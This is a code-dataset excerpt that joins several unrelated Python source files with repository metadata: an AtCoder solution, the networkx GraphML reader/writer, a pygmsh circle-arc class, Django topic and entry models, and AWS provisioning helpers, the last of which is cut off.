83bf67157c94ca91dcfad4370e48441432eeff06 | 3de2a746243ad1cb000994a06a0f9699db9a901f | /abc083b.py | 25f54f5c86bcc9984b5f3c4dbc00bddd018005eb | [] | no_license | takumi152/atcoder | 71d726ffdf2542d8abac0d9817afaff911db7c6c | ebac94f1227974aa2e6bf372e18605518de46441 | refs/heads/master | 2022-10-30T12:14:41.742596 | 2022-09-29T19:49:32 | 2022-09-29T19:49:32 | 181,502,518 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 386 | py |
def main():
buf = input()
buflist = buf.split()
N = int(buflist[0])
A = int(buflist[1])
B = int(buflist[2])
sum = 0
for i in range(1, N + 1):
count = 0
for d in [int(d) for d in str(i)]:
count += d
if count >= A and count <= B:
sum += i
print(sum)
if __name__ == '__main__':
main()
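# Note (illustrative alternative, not from the submission): the inner
# digit-sum loop can be written as a one-liner with the same result:
#   count = sum(map(int, str(i)))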
| [
"[email protected]"
] | |
ab4543f40cd972aedbc022fa7146b96e31d0acb6 | 853d4cec42071b76a80be38c58ffe0fbf9b9dc34 | /venv/Lib/site-packages/networkx/readwrite/graphml.py | e732e75ebcf81e1438ca3a072c6ff5c70d2f61f3 | [] | no_license | msainTesting/TwitterAnalysis | 5e1646dbf40badf887a86e125ef30a9edaa622a4 | b1204346508ba3e3922a52380ead5a8f7079726b | refs/heads/main | 2023-08-28T08:29:28.924620 | 2021-11-04T12:36:30 | 2021-11-04T12:36:30 | 424,242,582 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,908 | py | """
*******
GraphML
*******
Read and write graphs in GraphML format.
This implementation does not support mixed graphs (directed and undirected
edges together), hyperedges, nested graphs, or ports.
"GraphML is a comprehensive and easy-to-use file format for graphs. It
consists of a language core to describe the structural properties of a
graph and a flexible extension mechanism to add application-specific
data. Its main features include support of
* directed, undirected, and mixed graphs,
* hypergraphs,
* hierarchical graphs,
* graphical representations,
* references to external data,
* application-specific attribute data, and
* light-weight parsers.
Unlike many other file formats for graphs, GraphML does not use a
custom syntax. Instead, it is based on XML and hence ideally suited as
a common denominator for all kinds of services generating, archiving,
or processing graphs."
http://graphml.graphdrawing.org/
Format
------
GraphML is an XML format. See
http://graphml.graphdrawing.org/specification.html for the specification and
http://graphml.graphdrawing.org/primer/graphml-primer.html
for examples.
"""
import warnings
from collections import defaultdict
from xml.etree.ElementTree import Element, ElementTree, tostring, fromstring
try:
import lxml.etree as lxmletree
except ImportError:
lxmletree = None
import networkx as nx
from networkx.utils import open_file
__all__ = [
"write_graphml",
"read_graphml",
"generate_graphml",
"write_graphml_xml",
"write_graphml_lxml",
"parse_graphml",
"GraphMLWriter",
"GraphMLReader",
]
@open_file(1, mode="wb")
def write_graphml_xml(
G,
path,
encoding="utf-8",
prettyprint=True,
infer_numeric_types=False,
named_key_ids=False,
):
"""Write G in GraphML XML format to path
Parameters
----------
G : graph
A networkx graph
path : file or string
File or filename to write.
Filenames ending in .gz or .bz2 will be compressed.
encoding : string (optional)
Encoding for text data.
prettyprint : bool (optional)
If True use line breaks and indenting in output XML.
infer_numeric_types : boolean
Determine if numeric types should be generalized.
For example, if edges have both int and float 'weight' attributes,
we infer in GraphML that both are floats.
named_key_ids : bool (optional)
If True use attr.name as value for key elements' id attribute.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.write_graphml(G, "test.graphml")
Notes
-----
This implementation does not support mixed graphs (directed
    and undirected edges together), hyperedges, nested graphs, or ports.
"""
writer = GraphMLWriter(
encoding=encoding,
prettyprint=prettyprint,
infer_numeric_types=infer_numeric_types,
named_key_ids=named_key_ids,
)
writer.add_graph_element(G)
writer.dump(path)
@open_file(1, mode="wb")
def write_graphml_lxml(
G,
path,
encoding="utf-8",
prettyprint=True,
infer_numeric_types=False,
named_key_ids=False,
):
"""Write G in GraphML XML format to path
This function uses the LXML framework and should be faster than
the version using the xml library.
Parameters
----------
G : graph
A networkx graph
path : file or string
File or filename to write.
Filenames ending in .gz or .bz2 will be compressed.
encoding : string (optional)
Encoding for text data.
prettyprint : bool (optional)
If True use line breaks and indenting in output XML.
infer_numeric_types : boolean
Determine if numeric types should be generalized.
For example, if edges have both int and float 'weight' attributes,
we infer in GraphML that both are floats.
named_key_ids : bool (optional)
If True use attr.name as value for key elements' id attribute.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.write_graphml_lxml(G, "fourpath.graphml") # doctest: +SKIP
Notes
-----
This implementation does not support mixed graphs (directed
    and undirected edges together), hyperedges, nested graphs, or ports.
"""
writer = GraphMLWriterLxml(
path,
graph=G,
encoding=encoding,
prettyprint=prettyprint,
infer_numeric_types=infer_numeric_types,
named_key_ids=named_key_ids,
)
writer.dump()
def generate_graphml(G, encoding="utf-8", prettyprint=True, named_key_ids=False):
"""Generate GraphML lines for G
Parameters
----------
G : graph
A networkx graph
encoding : string (optional)
Encoding for text data.
prettyprint : bool (optional)
If True use line breaks and indenting in output XML.
named_key_ids : bool (optional)
If True use attr.name as value for key elements' id attribute.
Examples
--------
>>> G = nx.path_graph(4)
>>> linefeed = chr(10) # linefeed = \n
>>> s = linefeed.join(nx.generate_graphml(G)) # doctest: +SKIP
>>> for line in nx.generate_graphml(G): # doctest: +SKIP
... print(line)
Notes
-----
    This implementation does not support mixed graphs (directed and undirected
    edges together), hyperedges, nested graphs, or ports.
"""
writer = GraphMLWriter(
encoding=encoding, prettyprint=prettyprint, named_key_ids=named_key_ids
)
writer.add_graph_element(G)
yield from str(writer).splitlines()
@open_file(0, mode="rb")
def read_graphml(path, node_type=str, edge_key_type=int, force_multigraph=False):
"""Read graph in GraphML format from path.
Parameters
----------
path : file or string
File or filename to write.
Filenames ending in .gz or .bz2 will be compressed.
node_type: Python type (default: str)
Convert node ids to this type
edge_key_type: Python type (default: int)
Convert graphml edge ids to this type. Multigraphs use id as edge key.
Non-multigraphs add to edge attribute dict with name "id".
force_multigraph : bool (default: False)
If True, return a multigraph with edge keys. If False (the default)
return a multigraph when multiedges are in the graph.
Returns
-------
graph: NetworkX graph
If parallel edges are present or `force_multigraph=True` then
a MultiGraph or MultiDiGraph is returned. Otherwise a Graph/DiGraph.
The returned graph is directed if the file indicates it should be.
Notes
-----
Default node and edge attributes are not propagated to each node and edge.
They can be obtained from `G.graph` and applied to node and edge attributes
if desired using something like this:
>>> default_color = G.graph["node_default"]["color"] # doctest: +SKIP
>>> for node, data in G.nodes(data=True): # doctest: +SKIP
... if "color" not in data:
... data["color"] = default_color
>>> default_color = G.graph["edge_default"]["color"] # doctest: +SKIP
>>> for u, v, data in G.edges(data=True): # doctest: +SKIP
... if "color" not in data:
... data["color"] = default_color
    This implementation does not support mixed graphs (directed and undirected
edges together), hypergraphs, nested graphs, or ports.
For multigraphs the GraphML edge "id" will be used as the edge
key. If not specified then they "key" attribute will be used. If
there is no "key" attribute a default NetworkX multigraph edge key
will be provided.
    Files with the yEd "yfiles" extension can be read, but the graphics
information is discarded.
yEd compressed files ("file.graphmlz" extension) can be read by renaming
the file to "file.graphml.gz".
"""
reader = GraphMLReader(node_type, edge_key_type, force_multigraph)
# need to check for multiple graphs
glist = list(reader(path=path))
if len(glist) == 0:
# If no graph comes back, try looking for an incomplete header
header = b'<graphml xmlns="http://graphml.graphdrawing.org/xmlns">'
path.seek(0)
old_bytes = path.read()
new_bytes = old_bytes.replace(b"<graphml>", header)
glist = list(reader(string=new_bytes))
if len(glist) == 0:
raise nx.NetworkXError("file not successfully read as graphml")
return glist[0]
def parse_graphml(
graphml_string, node_type=str, edge_key_type=int, force_multigraph=False
):
"""Read graph in GraphML format from string.
Parameters
----------
graphml_string : string
String containing graphml information
(e.g., contents of a graphml file).
node_type: Python type (default: str)
Convert node ids to this type
edge_key_type: Python type (default: int)
Convert graphml edge ids to this type. Multigraphs use id as edge key.
Non-multigraphs add to edge attribute dict with name "id".
force_multigraph : bool (default: False)
If True, return a multigraph with edge keys. If False (the default)
return a multigraph when multiedges are in the graph.
Returns
-------
graph: NetworkX graph
If no parallel edges are found a Graph or DiGraph is returned.
Otherwise a MultiGraph or MultiDiGraph is returned.
Examples
--------
>>> G = nx.path_graph(4)
>>> linefeed = chr(10) # linefeed = \n
>>> s = linefeed.join(nx.generate_graphml(G))
>>> H = nx.parse_graphml(s)
Notes
-----
Default node and edge attributes are not propagated to each node and edge.
They can be obtained from `G.graph` and applied to node and edge attributes
if desired using something like this:
>>> default_color = G.graph["node_default"]["color"] # doctest: +SKIP
>>> for node, data in G.nodes(data=True): # doctest: +SKIP
... if "color" not in data:
... data["color"] = default_color
>>> default_color = G.graph["edge_default"]["color"] # doctest: +SKIP
>>> for u, v, data in G.edges(data=True): # doctest: +SKIP
... if "color" not in data:
... data["color"] = default_color
    This implementation does not support mixed graphs (directed and undirected
edges together), hypergraphs, nested graphs, or ports.
For multigraphs the GraphML edge "id" will be used as the edge
key. If not specified then they "key" attribute will be used. If
there is no "key" attribute a default NetworkX multigraph edge key
will be provided.
"""
reader = GraphMLReader(node_type, edge_key_type, force_multigraph)
# need to check for multiple graphs
glist = list(reader(string=graphml_string))
if len(glist) == 0:
# If no graph comes back, try looking for an incomplete header
header = '<graphml xmlns="http://graphml.graphdrawing.org/xmlns">'
new_string = graphml_string.replace("<graphml>", header)
glist = list(reader(string=new_string))
if len(glist) == 0:
raise nx.NetworkXError("file not successfully read as graphml")
return glist[0]
class GraphML:
NS_GRAPHML = "http://graphml.graphdrawing.org/xmlns"
NS_XSI = "http://www.w3.org/2001/XMLSchema-instance"
# xmlns:y="http://www.yworks.com/xml/graphml"
NS_Y = "http://www.yworks.com/xml/graphml"
SCHEMALOCATION = " ".join(
[
"http://graphml.graphdrawing.org/xmlns",
"http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd",
]
)
types = [
(int, "integer"), # for Gephi GraphML bug
(str, "yfiles"),
(str, "string"),
(int, "int"),
(float, "float"),
(float, "double"),
(bool, "boolean"),
]
# These additions to types allow writing numpy types
try:
import numpy as np
    except ImportError:
pass
else:
# prepend so that python types are created upon read (last entry wins)
types = [
(np.float64, "float"),
(np.float32, "float"),
(np.float16, "float"),
(np.float_, "float"),
(np.int_, "int"),
(np.int8, "int"),
(np.int16, "int"),
(np.int32, "int"),
(np.int64, "int"),
(np.uint8, "int"),
(np.uint16, "int"),
(np.uint32, "int"),
(np.uint64, "int"),
(np.int_, "int"),
(np.intc, "int"),
(np.intp, "int"),
] + types
xml_type = dict(types)
python_type = dict(reversed(a) for a in types)
# This page says that data types in GraphML follow Java(TM).
# http://graphml.graphdrawing.org/primer/graphml-primer.html#AttributesDefinition
# true and false are the only boolean literals:
# http://en.wikibooks.org/wiki/Java_Programming/Literals#Boolean_Literals
convert_bool = {
# We use data.lower() in actual use.
"true": True,
"false": False,
# Include integer strings for convenience.
"0": False,
0: False,
"1": True,
1: True,
}
class GraphMLWriter(GraphML):
def __init__(
self,
graph=None,
encoding="utf-8",
prettyprint=True,
infer_numeric_types=False,
named_key_ids=False,
):
self.myElement = Element
self.infer_numeric_types = infer_numeric_types
self.prettyprint = prettyprint
self.named_key_ids = named_key_ids
self.encoding = encoding
self.xml = self.myElement(
"graphml",
{
"xmlns": self.NS_GRAPHML,
"xmlns:xsi": self.NS_XSI,
"xsi:schemaLocation": self.SCHEMALOCATION,
},
)
self.keys = {}
self.attributes = defaultdict(list)
self.attribute_types = defaultdict(set)
if graph is not None:
self.add_graph_element(graph)
def __str__(self):
if self.prettyprint:
self.indent(self.xml)
s = tostring(self.xml).decode(self.encoding)
return s
def attr_type(self, name, scope, value):
"""Infer the attribute type of data named name. Currently this only
supports inference of numeric types.
        If self.infer_numeric_types is false, the Python type of the value is
        used. Otherwise, pick the most general of the types found across all
        values with this name and scope. This means edges with data named
        'weight' are treated separately from nodes with data named 'weight'.
"""
if self.infer_numeric_types:
types = self.attribute_types[(name, scope)]
if len(types) > 1:
types = {self.xml_type[t] for t in types}
if "string" in types:
return str
elif "float" in types or "double" in types:
return float
else:
return int
else:
return list(types)[0]
else:
return type(value)
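    # Illustrative example (not part of the networkx source): with
    # infer_numeric_types=True, an attribute seen as both int and float
    # generalizes to float, so
    #   G.add_edge(1, 2, weight=1)     # int
    #   G.add_edge(2, 3, weight=2.5)   # float
    # writes both 'weight' values with attr.type="double".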
def get_key(self, name, attr_type, scope, default):
keys_key = (name, attr_type, scope)
try:
return self.keys[keys_key]
except KeyError:
if self.named_key_ids:
new_id = name
else:
new_id = f"d{len(list(self.keys))}"
self.keys[keys_key] = new_id
key_kwargs = {
"id": new_id,
"for": scope,
"attr.name": name,
"attr.type": attr_type,
}
key_element = self.myElement("key", **key_kwargs)
# add subelement for data default value if present
if default is not None:
default_element = self.myElement("default")
default_element.text = str(default)
key_element.append(default_element)
self.xml.insert(0, key_element)
return new_id
def add_data(self, name, element_type, value, scope="all", default=None):
"""
Make a data element for an edge or a node. Keep a log of the
type in the keys table.
"""
if element_type not in self.xml_type:
msg = f"GraphML writer does not support {element_type} as data values."
raise nx.NetworkXError(msg)
keyid = self.get_key(name, self.xml_type[element_type], scope, default)
data_element = self.myElement("data", key=keyid)
data_element.text = str(value)
return data_element
def add_attributes(self, scope, xml_obj, data, default):
"""Appends attribute data to edges or nodes, and stores type information
to be added later. See add_graph_element.
"""
for k, v in data.items():
self.attribute_types[(str(k), scope)].add(type(v))
self.attributes[xml_obj].append([k, v, scope, default.get(k)])
def add_nodes(self, G, graph_element):
default = G.graph.get("node_default", {})
for node, data in G.nodes(data=True):
node_element = self.myElement("node", id=str(node))
self.add_attributes("node", node_element, data, default)
graph_element.append(node_element)
def add_edges(self, G, graph_element):
if G.is_multigraph():
for u, v, key, data in G.edges(data=True, keys=True):
edge_element = self.myElement(
"edge", source=str(u), target=str(v), id=str(key)
)
default = G.graph.get("edge_default", {})
self.add_attributes("edge", edge_element, data, default)
graph_element.append(edge_element)
else:
for u, v, data in G.edges(data=True):
edge_element = self.myElement("edge", source=str(u), target=str(v))
default = G.graph.get("edge_default", {})
self.add_attributes("edge", edge_element, data, default)
graph_element.append(edge_element)
def add_graph_element(self, G):
"""
Serialize graph G in GraphML to the stream.
"""
if G.is_directed():
default_edge_type = "directed"
else:
default_edge_type = "undirected"
graphid = G.graph.pop("id", None)
if graphid is None:
graph_element = self.myElement("graph", edgedefault=default_edge_type)
else:
graph_element = self.myElement(
"graph", edgedefault=default_edge_type, id=graphid
)
default = {}
data = {
k: v
for (k, v) in G.graph.items()
if k not in ["node_default", "edge_default"]
}
self.add_attributes("graph", graph_element, data, default)
self.add_nodes(G, graph_element)
self.add_edges(G, graph_element)
# self.attributes contains a mapping from XML Objects to a list of
# data that needs to be added to them.
# We postpone processing in order to do type inference/generalization.
# See self.attr_type
for (xml_obj, data) in self.attributes.items():
for (k, v, scope, default) in data:
xml_obj.append(
self.add_data(
str(k), self.attr_type(k, scope, v), str(v), scope, default
)
)
self.xml.append(graph_element)
def add_graphs(self, graph_list):
""" Add many graphs to this GraphML document. """
for G in graph_list:
self.add_graph_element(G)
def dump(self, stream):
if self.prettyprint:
self.indent(self.xml)
document = ElementTree(self.xml)
document.write(stream, encoding=self.encoding, xml_declaration=True)
def indent(self, elem, level=0):
# in-place prettyprint formatter
i = "\n" + level * " "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
self.indent(elem, level + 1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
class IncrementalElement:
"""Wrapper for _IncrementalWriter providing an Element like interface.
    This wrapper is not intended to be a complete implementation, but rather
    to handle the calls used in GraphMLWriter.
"""
def __init__(self, xml, prettyprint):
self.xml = xml
self.prettyprint = prettyprint
def append(self, element):
self.xml.write(element, pretty_print=self.prettyprint)
class GraphMLWriterLxml(GraphMLWriter):
def __init__(
self,
path,
graph=None,
encoding="utf-8",
prettyprint=True,
infer_numeric_types=False,
named_key_ids=False,
):
self.myElement = lxmletree.Element
self._encoding = encoding
self._prettyprint = prettyprint
self.named_key_ids = named_key_ids
self.infer_numeric_types = infer_numeric_types
self._xml_base = lxmletree.xmlfile(path, encoding=encoding)
self._xml = self._xml_base.__enter__()
self._xml.write_declaration()
        # We need an xml variable that supports insertion. This call is
# used for adding the keys to the document.
# We will store those keys in a plain list, and then after the graph
# element is closed we will add them to the main graphml element.
self.xml = []
self._keys = self.xml
self._graphml = self._xml.element(
"graphml",
{
"xmlns": self.NS_GRAPHML,
"xmlns:xsi": self.NS_XSI,
"xsi:schemaLocation": self.SCHEMALOCATION,
},
)
self._graphml.__enter__()
self.keys = {}
self.attribute_types = defaultdict(set)
if graph is not None:
self.add_graph_element(graph)
def add_graph_element(self, G):
"""
Serialize graph G in GraphML to the stream.
"""
if G.is_directed():
default_edge_type = "directed"
else:
default_edge_type = "undirected"
graphid = G.graph.pop("id", None)
if graphid is None:
graph_element = self._xml.element("graph", edgedefault=default_edge_type)
else:
graph_element = self._xml.element(
"graph", edgedefault=default_edge_type, id=graphid
)
# gather attributes types for the whole graph
# to find the most general numeric format needed.
# Then pass through attributes to create key_id for each.
graphdata = {
k: v
for k, v in G.graph.items()
if k not in ("node_default", "edge_default")
}
node_default = G.graph.get("node_default", {})
edge_default = G.graph.get("edge_default", {})
# Graph attributes
for k, v in graphdata.items():
self.attribute_types[(str(k), "graph")].add(type(v))
for k, v in graphdata.items():
element_type = self.xml_type[self.attr_type(k, "graph", v)]
self.get_key(str(k), element_type, "graph", None)
# Nodes and data
for node, d in G.nodes(data=True):
for k, v in d.items():
self.attribute_types[(str(k), "node")].add(type(v))
for node, d in G.nodes(data=True):
for k, v in d.items():
T = self.xml_type[self.attr_type(k, "node", v)]
self.get_key(str(k), T, "node", node_default.get(k))
# Edges and data
if G.is_multigraph():
for u, v, ekey, d in G.edges(keys=True, data=True):
for k, v in d.items():
self.attribute_types[(str(k), "edge")].add(type(v))
for u, v, ekey, d in G.edges(keys=True, data=True):
for k, v in d.items():
T = self.xml_type[self.attr_type(k, "edge", v)]
self.get_key(str(k), T, "edge", edge_default.get(k))
else:
for u, v, d in G.edges(data=True):
for k, v in d.items():
self.attribute_types[(str(k), "edge")].add(type(v))
for u, v, d in G.edges(data=True):
for k, v in d.items():
T = self.xml_type[self.attr_type(k, "edge", v)]
self.get_key(str(k), T, "edge", edge_default.get(k))
# Now add attribute keys to the xml file
for key in self.xml:
self._xml.write(key, pretty_print=self._prettyprint)
# The incremental_writer writes each node/edge as it is created
incremental_writer = IncrementalElement(self._xml, self._prettyprint)
with graph_element:
self.add_attributes("graph", incremental_writer, graphdata, {})
self.add_nodes(G, incremental_writer) # adds attributes too
self.add_edges(G, incremental_writer) # adds attributes too
def add_attributes(self, scope, xml_obj, data, default):
"""Appends attribute data."""
for k, v in data.items():
data_element = self.add_data(
str(k), self.attr_type(str(k), scope, v), str(v), scope, default.get(k)
)
xml_obj.append(data_element)
def __str__(self):
return object.__str__(self)
def dump(self):
self._graphml.__exit__(None, None, None)
self._xml_base.__exit__(None, None, None)
# Choose a writer function for default
if lxmletree is None:
write_graphml = write_graphml_xml
else:
write_graphml = write_graphml_lxml
class GraphMLReader(GraphML):
"""Read a GraphML document. Produces NetworkX graph objects."""
def __init__(self, node_type=str, edge_key_type=int, force_multigraph=False):
self.node_type = node_type
self.edge_key_type = edge_key_type
self.multigraph = force_multigraph # If False, test for multiedges
self.edge_ids = {} # dict mapping (u,v) tuples to edge id attributes
def __call__(self, path=None, string=None):
if path is not None:
self.xml = ElementTree(file=path)
elif string is not None:
self.xml = fromstring(string)
else:
raise ValueError("Must specify either 'path' or 'string' as kwarg")
(keys, defaults) = self.find_graphml_keys(self.xml)
for g in self.xml.findall(f"{{{self.NS_GRAPHML}}}graph"):
yield self.make_graph(g, keys, defaults)
def make_graph(self, graph_xml, graphml_keys, defaults, G=None):
# set default graph type
edgedefault = graph_xml.get("edgedefault", None)
if G is None:
if edgedefault == "directed":
G = nx.MultiDiGraph()
else:
G = nx.MultiGraph()
# set defaults for graph attributes
G.graph["node_default"] = {}
G.graph["edge_default"] = {}
for key_id, value in defaults.items():
key_for = graphml_keys[key_id]["for"]
name = graphml_keys[key_id]["name"]
python_type = graphml_keys[key_id]["type"]
if key_for == "node":
G.graph["node_default"].update({name: python_type(value)})
if key_for == "edge":
G.graph["edge_default"].update({name: python_type(value)})
# hyperedges are not supported
hyperedge = graph_xml.find(f"{{{self.NS_GRAPHML}}}hyperedge")
if hyperedge is not None:
raise nx.NetworkXError("GraphML reader doesn't support hyperedges")
# add nodes
for node_xml in graph_xml.findall(f"{{{self.NS_GRAPHML}}}node"):
self.add_node(G, node_xml, graphml_keys, defaults)
# add edges
for edge_xml in graph_xml.findall(f"{{{self.NS_GRAPHML}}}edge"):
self.add_edge(G, edge_xml, graphml_keys)
# add graph data
data = self.decode_data_elements(graphml_keys, graph_xml)
G.graph.update(data)
# switch to Graph or DiGraph if no parallel edges were found
if self.multigraph:
return G
G = nx.DiGraph(G) if G.is_directed() else nx.Graph(G)
# add explicit edge "id" from file as attribute in NX graph.
nx.set_edge_attributes(G, values=self.edge_ids, name="id")
return G
def add_node(self, G, node_xml, graphml_keys, defaults):
"""Add a node to the graph.
"""
# warn on finding unsupported ports tag
ports = node_xml.find(f"{{{self.NS_GRAPHML}}}port")
if ports is not None:
warnings.warn("GraphML port tag not supported.")
# find the node by id and cast it to the appropriate type
node_id = self.node_type(node_xml.get("id"))
# get data/attributes for node
data = self.decode_data_elements(graphml_keys, node_xml)
G.add_node(node_id, **data)
# get child nodes
if node_xml.attrib.get("yfiles.foldertype") == "group":
graph_xml = node_xml.find(f"{{{self.NS_GRAPHML}}}graph")
self.make_graph(graph_xml, graphml_keys, defaults, G)
def add_edge(self, G, edge_element, graphml_keys):
"""Add an edge to the graph.
"""
# warn on finding unsupported ports tag
ports = edge_element.find(f"{{{self.NS_GRAPHML}}}port")
if ports is not None:
warnings.warn("GraphML port tag not supported.")
# raise error if we find mixed directed and undirected edges
directed = edge_element.get("directed")
if G.is_directed() and directed == "false":
msg = "directed=false edge found in directed graph."
raise nx.NetworkXError(msg)
if (not G.is_directed()) and directed == "true":
msg = "directed=true edge found in undirected graph."
raise nx.NetworkXError(msg)
source = self.node_type(edge_element.get("source"))
target = self.node_type(edge_element.get("target"))
data = self.decode_data_elements(graphml_keys, edge_element)
# GraphML stores edge ids as an attribute
# NetworkX uses them as keys in multigraphs too if no key
# attribute is specified
edge_id = edge_element.get("id")
if edge_id:
# self.edge_ids is used by `make_graph` method for non-multigraphs
self.edge_ids[source, target] = edge_id
try:
edge_id = self.edge_key_type(edge_id)
except ValueError: # Could not convert.
pass
else:
edge_id = data.get("key")
if G.has_edge(source, target):
# mark this as a multigraph
self.multigraph = True
# Use add_edges_from to avoid error with add_edge when `'key' in data`
# Note there is only one edge here...
G.add_edges_from([(source, target, edge_id, data)])
def decode_data_elements(self, graphml_keys, obj_xml):
"""Use the key information to decode the data XML if present."""
data = {}
for data_element in obj_xml.findall(f"{{{self.NS_GRAPHML}}}data"):
key = data_element.get("key")
try:
data_name = graphml_keys[key]["name"]
data_type = graphml_keys[key]["type"]
except KeyError as e:
raise nx.NetworkXError(f"Bad GraphML data: no key {key}") from e
text = data_element.text
# assume anything with subelements is a yfiles extension
if text is not None and len(list(data_element)) == 0:
if data_type == bool:
# Ignore cases.
# http://docs.oracle.com/javase/6/docs/api/java/lang/
# Boolean.html#parseBoolean%28java.lang.String%29
data[data_name] = self.convert_bool[text.lower()]
else:
data[data_name] = data_type(text)
elif len(list(data_element)) > 0:
# Assume yfiles as subelements, try to extract node_label
node_label = None
for node_type in ["ShapeNode", "SVGNode", "ImageNode"]:
pref = f"{{{self.NS_Y}}}{node_type}/{{{self.NS_Y}}}"
geometry = data_element.find(f"{pref}Geometry")
if geometry is not None:
data["x"] = geometry.get("x")
data["y"] = geometry.get("y")
if node_label is None:
node_label = data_element.find(f"{pref}NodeLabel")
if node_label is not None:
data["label"] = node_label.text
                # check all the different types of edges available in yEd.
for e in [
"PolyLineEdge",
"SplineEdge",
"QuadCurveEdge",
"BezierEdge",
"ArcEdge",
]:
pref = f"{{{self.NS_Y}}}{e}/{{{self.NS_Y}}}"
edge_label = data_element.find(f"{pref}EdgeLabel")
if edge_label is not None:
break
if edge_label is not None:
data["label"] = edge_label.text
return data
def find_graphml_keys(self, graph_element):
"""Extracts all the keys and key defaults from the xml.
"""
graphml_keys = {}
graphml_key_defaults = {}
for k in graph_element.findall(f"{{{self.NS_GRAPHML}}}key"):
attr_id = k.get("id")
attr_type = k.get("attr.type")
attr_name = k.get("attr.name")
yfiles_type = k.get("yfiles.type")
if yfiles_type is not None:
attr_name = yfiles_type
attr_type = "yfiles"
if attr_type is None:
attr_type = "string"
warnings.warn(f"No key type for id {attr_id}. Using string")
if attr_name is None:
raise nx.NetworkXError(f"Unknown key for id {attr_id}.")
graphml_keys[attr_id] = {
"name": attr_name,
"type": self.python_type[attr_type],
"for": k.get("for"),
}
# check for "default" subelement of key element
default = k.find(f"{{{self.NS_GRAPHML}}}default")
if default is not None:
graphml_key_defaults[attr_id] = default.text
return graphml_keys, graphml_key_defaults
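# Round-trip sketch (illustrative; mirrors the docstring examples above):
#   G = nx.path_graph(4)
#   nx.write_graphml(G, "test.graphml")
#   H = nx.read_graphml("test.graphml")  # node ids are read back as str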
| [
"[email protected]"
] | |
0442dccb71f8076d97bd44918f3116cd9633224c | 75fe89a5ca7ceb91757199c4dde6fd20a69c94b9 | /pygmsh/circle_arc.py | 527ec58c5c88de3903e536d467a0c54bbda050b0 | [
"MIT"
] | permissive | guifon1000/pygmsh | 39d1c1d3e890f64afa94e35e6da4e0c6967d3373 | ce6bf8f080c359b1ab81c9d1adee6a81d3419d51 | refs/heads/master | 2021-01-22T23:53:42.835887 | 2017-03-20T13:45:53 | 2017-03-20T13:45:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 488 | py | # -*- coding: utf-8 -*-
#
from .line_base import LineBase
from .point import Point
class CircleArc(LineBase):
def __init__(self, points):
super(CircleArc, self).__init__()
for p in points:
assert isinstance(p, Point)
self.points = points
self.code = '\n'.join([
'%s = newl;' % self.id,
'Circle(%s) = {%s, %s, %s};'
% (self.id, points[0].id, points[1].id, points[2].id)
])
return
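# Usage sketch (assumption: p0, p1, p2 are pygmsh Point objects; Gmsh's
# Circle takes the points in start, center, end order):
#   arc = CircleArc([p0, p1, p2])
#   print(arc.code)  # -> "<id> = newl;\nCircle(<id>) = {p0, p1, p2};"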
| [
"[email protected]"
] | |
229da8f1da7b2924a17df7c56df8eef9f31d5ee1 | bc0d87befa0329c50c2e57ead730050b648e15c6 | /leaning_logs/models.py | 48d76ed238355d3f04b39298a65d73a02204d8a6 | [] | no_license | YGragon/DjangoLearningLogs | 85a0598849600536cdbf45cfb9444f36dfd31c57 | e3228aed7aa181d657b9aa58d93e9d37f09d918d | refs/heads/master | 2021-09-10T19:36:52.924500 | 2018-04-01T00:11:13 | 2018-04-01T00:11:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,676 | py | from django.db import models
from django.contrib.auth.models import User
import json
from datetime import date, datetime
class Topic(models.Model):
"""用户要学习的主题."""
text = models.CharField(max_length=200)
date_added = models.DateTimeField(auto_now_add=True)
    # Foreign key to User, identifying which user owns this topic.
    owner = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
"""返回模型的字符串表示"""
return self.text
class Entry(models.Model):
"""用户发表的文章"""
# 外键是主题,可以通过这个外键确定这个文章属于哪个主题
topic = models.ForeignKey(Topic, "on_delete=models.CASCADE")
text = models.TextField()
date_added = models.DateTimeField(auto_now_add = True)
class Meta:
verbose_name_plural = 'entries'
def __str__(self):
"""返回模型的字符串表示"""
return self.text[:50] + "..."
class MyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime):
return obj.strftime('%Y-%m-%d %H:%M:%S')
elif isinstance(obj, date):
return obj.strftime("%Y-%m-%d")
else:
return json.JSONEncoder.default(self, obj)
class TopicEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Topic):
return obj.text
return json.JSONEncoder.default(self, obj)
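# Usage sketch for the encoders (illustrative, not part of the original
# file):
#   import json
#   json.dumps(datetime.now(), cls=MyEncoder)  # -> '"2018-04-01 00:11:13"'
#   json.dumps(topic, cls=TopicEncoder)        # serializes a Topic as its text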
class EntryEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Entry):
return obj.text
else:
return json.JSONEncoder.default(self, obj) | [
"[email protected]"
] | |
ca87266c74882e0db39d481e2bf5488941ec7f3e | 61e4cb5f60541939e122714aa085f2028a7904c5 | /duckdown/tool/provision/utils.py | 90d0b5cfc9e95d9eee414dbe564ed3dae2034188 | [
"MIT"
] | permissive | blueshed/duckdown | 1a07bf541a5849000d9e8622622cc67a3bec933f | e6d0e62d378bd2d9ed0cd5ce4bc7ab3476b86020 | refs/heads/master | 2023-01-30T12:18:05.713016 | 2020-12-08T20:38:36 | 2020-12-08T20:38:36 | 314,370,191 | 0 | 0 | MIT | 2020-12-08T14:54:11 | 2020-11-19T21:06:47 | Python | UTF-8 | Python | false | false | 711 | py | """ utils """
import boto3
from pkg_resources import resource_filename
def get_bucket_arn(bucket_name, region="", account_id=""):
""" We need the arn of a queue """
bucket_arn = f"arn:aws:s3:{region}:{account_id}:{bucket_name}"
return bucket_arn
def get_aws_region_account():
""" Return the aws region and account_id """
session = boto3.Session()
region = session.region_name
sts = session.client("sts")
response = sts.get_caller_identity()
return region, response["Account"]
def get_resource(name):
""" return resource content """
path = resource_filename("duckdown.tool.provision", f"resources/{name}")
with open(path) as file:
return file.read()
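# Usage sketch (note: the default empty region/account yields the usual
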